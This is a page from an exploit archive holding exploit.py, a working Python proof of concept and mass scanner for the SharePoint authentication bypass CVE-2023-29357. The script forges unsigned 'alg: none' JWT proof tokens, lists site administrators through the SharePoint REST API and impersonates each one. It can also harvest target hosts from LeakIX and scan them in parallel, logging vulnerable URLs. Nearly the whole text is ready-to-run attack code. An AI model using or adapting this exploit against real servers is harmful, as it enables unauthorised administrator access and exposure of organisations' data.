4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import json
import time
import base64
import requests
import argparse
from rich.console import Console
from urllib.parse import urlparse
from typing import Union, List, Dict
from alive_progress import alive_bar
from leakpy.scraper import LeakixScraper
from concurrent.futures import ThreadPoolExecutor, as_completed
from requests.packages.urllib3.exceptions import InsecureRequestWarning

console = Console()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


class SharePoint:
    client_id = "00000003-0000-0ff1-ce00-000000000000"
    
    def __init__(self, url: str, verbose: bool):
        self.url = url.rstrip('/')
        self.hostname = urlparse(url).hostname
        self.verbose = verbose

        if self.verbose:
            console.print("[+] URL:", self.url, style="bold green")
            console.print("[+] Hostname:", self.hostname, style="bold green")

        self.realm = self.get_realm()
        self.aud = self.construct_aud_field()

    def get_realm(self) -> str:
        headers = {"Authorization": "Bearer "}
        response = requests.get(self.url  + '/_api/web/siteusers', headers=headers, verify=False, timeout=3)

        if response.status_code != 401:
            console.print("[-] Unable to retrieve realm", style="bold red") if self.verbose else None
            raise Exception("Unable to retrieve realm")

        www_authenticate_header = response.headers.get('WWW-Authenticate', '')
        if www_authenticate_header:
            realm = None
            for header in www_authenticate_header.split(','):
                if 'realm="' in header:
                    try:
                        realm = header.split('realm="')[1].split('"')[0]
                        break 
                    except IndexError:
                        continue

        if self.verbose:
            console.print("[+] Realm:", realm, style="bold green")

        return realm

    def construct_aud_field(self) -> str:
        aud = f"{self.client_id}@{self.realm}"

        if self.verbose:
            console.print("[+] Aud Field:", aud, style="bold green")

        return aud

    def spoof_admin_users(self, admin_users: List[Dict[str, str]]) -> None:
        current_time = int(time.time())
        expiration_time = current_time + 3600

        for user in admin_users:
            payload = {
                "aud": self.aud,
                "iss": self.client_id,
                "nbf": current_time,
                "exp": expiration_time,
                "ver": "hashedprooftoken",
                "nameid": user.get("NameId", ""),
                "nii": user.get("NameIdIssuer", ""),
                "endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
                "endpointurlLength": 1,
                "isloopback": True,
                "isuser": True
            }

            header = {"alg": "none"}
            encoded_header = base64.urlsafe_b64encode(json.dumps(header).encode()).rstrip(b'=')
            encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')
            
            jwt_token = f"{encoded_header.decode()}.{encoded_payload.decode()}.AAA"
            
            headers = {
                "Accept": "application/json",
                "Authorization": f"Bearer {jwt_token}",
                "X-PROOF_TOKEN": jwt_token,
            }

            endpoint_url = self.url.strip() + '/_api/web/currentuser'
            response = requests.get(endpoint_url, headers=headers, verify=False, timeout=5)
            if response.status_code == 200:
                try:
                    parsed_response = json.loads(response.text)
                    console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green")
                    console.print(json.dumps(parsed_response, indent=4), style="bold green")
                except json.JSONDecodeError:
                    console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green")
                    console.print(f"Received non-JSON response:\n{response.text}", style="bold yellow")
            else:
                console.print(f"[-] Spoofing failed for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'. Status code: {response.status_code}", style="bold red")

    def create_jwt_token(self) -> str:
        header = {"alg": "none"}
        current_time = int(time.time())
        expiration_time = current_time + 3600
        
        payload = {
            "aud": self.aud,
            "iss": self.client_id,
            "nbf": int(current_time),
            "exp": int(expiration_time),
            "ver": "hashedprooftoken",
            "nameid": f'{self.client_id}@{self.realm}',
            "endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
            "endpointurlLength": 1,
            "isloopback": True
        }

        encoded_header = base64.urlsafe_b64encode(json.dumps(header).encode()).rstrip(b'=')
        encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')

        jwt_token = f"{encoded_header.decode()}.{encoded_payload.decode()}.AAA"

        if self.verbose:
            console.print("[+] JWT Token:", jwt_token, style="bold green")

        return jwt_token

    
    def authenticate_with_token(self, token: str) -> Union[bool, List[Dict[str, str]]]:
        headers = {
            "Accept": "application/json",
            "Authorization": f"Bearer {token}",
            "X-PROOF_TOKEN": token,
        }

        response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=5)

        if self.verbose:
            console.print("[!] Attempting authentication for", self.url, "with token", style="bold yellow")

        if response.status_code == 200:
            try:
                parsed_response = json.loads(response.text)
                users = parsed_response.get('value', [])
                admin_users = [user for user in users if user.get('IsSiteAdmin', False) is True]
                admin_info_list = []
                
                for user in admin_users:
                    admin_info = {
                        "Title": user.get('Title', 'N/A'),
                        "Email": user.get('Email', 'N/A'),
                        "NameId": user.get('UserId', {}).get('NameId', 'N/A'),
                        "NameIdIssuer": user.get('UserId', {}).get('NameIdIssuer', 'N/A')
                    }
                    admin_info_list.append(admin_info)
                
                console.print(f"[+] Authenticated successfully for {self.url}\n", style="bold green")
                if self.verbose and admin_users:
                    for admin_info in admin_info_list:
                        console.print(json.dumps(admin_info, indent=2), style="bold green")
                        console.print("=+"*20, style="bold green")
                        
                return admin_info_list if admin_info_list else True
                
            except json.JSONDecodeError:
                if self.verbose:
                    console.print(f"[+] Authenticated successfully for {self.url} but failed to parse the response text as JSON\nResponse Text: {response.text}", style="bold yellow")
                return True
            
        else:
            if self.verbose:
                console.print("[-] Authentication failed for", self.url, ". Status code:", response.status_code, style="bold red")
            return False

def check_url(url: str, output_file: str = None, verbose: bool = False, mass_exploit: bool = False):
    try:
        sp = SharePoint(url, verbose=verbose)
        jwt_token = sp.create_jwt_token()
        authenticated = sp.authenticate_with_token(jwt_token)
        
        if authenticated:
            if output_file:
                with open(output_file, 'a') as file:
                    file.write(f"{url}\n")
            
            if not mass_exploit and isinstance(authenticated, list):
                sp.spoof_admin_users(authenticated)
                
    except Exception as e:
        if verbose:
            console.print("[!] Error in check_url:", str(e), style="bold red")

    
def fetch_from_leakix(fields="protocol, host, port", bulk=False, pages=2):
    LEAKIX_API_KEY = "" # Configure this line with your LeakIX Pro API Key to use LeakPy

    if LEAKIX_API_KEY == "":
        console.print("[bold red]Please configure the Leakix API key.[/bold red]")
        exit(1)
    
    scraper = LeakixScraper(api_key=LEAKIX_API_KEY, verbose=True)
    
    results = scraper.execute(
        scope="leak",
        query='+plugin:SharePointPlugin',
        fields=fields,
        pages=pages,
        use_bulk=bulk,
    )

    url_dict = {}
    for result in results:
        protocol = result.get("protocol")
        host = result.get("host")
        port = result.get("port")
        url = f"{protocol}://{host}:{port}"
        url_dict[url] = None

    return list(url_dict.keys())

def main():
    parser = argparse.ArgumentParser(description='Mass tester for SharePoint CVE-2023–29357 Authentication Bypass.')
    parser.add_argument('-u', '--url', type=str, help='The base url for the requests', required=False)
    parser.add_argument('-l', '--list', type=str, help='File containing a list of base urls to scan', required=False)
    parser.add_argument('-t', '--threads', type=int, help='Number of threads to use', default=10)
    parser.add_argument('-o', '--output', type=str, help='File to output vulnerable urls', default='output.txt')
    parser.add_argument('-v', '--verbose', action='store_true', help='Print verbose output', default=False)
    parser.add_argument('--leakpy', action='store_true', help="Use Leakix to fetch URLs based on leaks")
    parser.add_argument('--bulk', action='store_true', help="Use bulk_mode on LeakIX (Pro API Key only)")
    parser.add_argument('--pages', type=int, default=2, help="Page results on LeakIX")

    args = parser.parse_args()

    urls = []
    if args.leakpy:
        urls = fetch_from_leakix(bulk=args.bulk, pages=args.pages)
    elif args.list:
        with open(args.list, 'r') as file:
            urls = [line.strip() for line in file.readlines()]
    elif args.url:
        urls = [args.url]

    if urls:
        if (len(urls) > 1 and (args.leakpy or args.list)):
            with ThreadPoolExecutor(max_workers=args.threads) as executor, alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
                futures = {executor.submit(check_url, url, args.output, args.verbose, mass_exploit=True): url for url in urls}
                for future in as_completed(futures):
                    bar()
        else:
            check_url(urls[0], args.output, args.verbose, mass_exploit=False)
    else:
        console.print("[red]Please provide a url or a file with a list of base urls to scan.[/red]")


if __name__ == "__main__":
    main()